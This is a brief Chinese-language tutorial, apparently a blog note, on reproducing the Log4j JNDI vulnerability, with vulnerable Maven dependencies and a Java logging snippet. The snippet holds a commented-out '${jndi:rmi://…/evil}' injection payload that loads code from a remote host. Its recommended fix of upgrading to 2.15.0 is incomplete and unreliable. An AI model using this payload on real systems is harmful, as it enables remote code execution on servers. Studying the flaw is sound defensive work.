一、Log4j
二、漏洞复现
2.1 log4j版本
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
2.2 log服务段代码
private static final Logger LOGGER = LogManager.getLogger();
public static void main(String[] args) {
//String username = "${jndi:rmi://192.168.65.31:1099/evil}";
String username1 = "123456";
String username2 = "${java:os}"; // 输出操作系统有关信息,lookup的功能
LOGGER.info("hello,{}!",username2);
}
2.3 黑客端代码
2.4 执行端代码
是在log服务端代码执行的,bug严重
三、解决方案
3.1 升级log4j版本
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.15.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.15.0</version>
</dependency>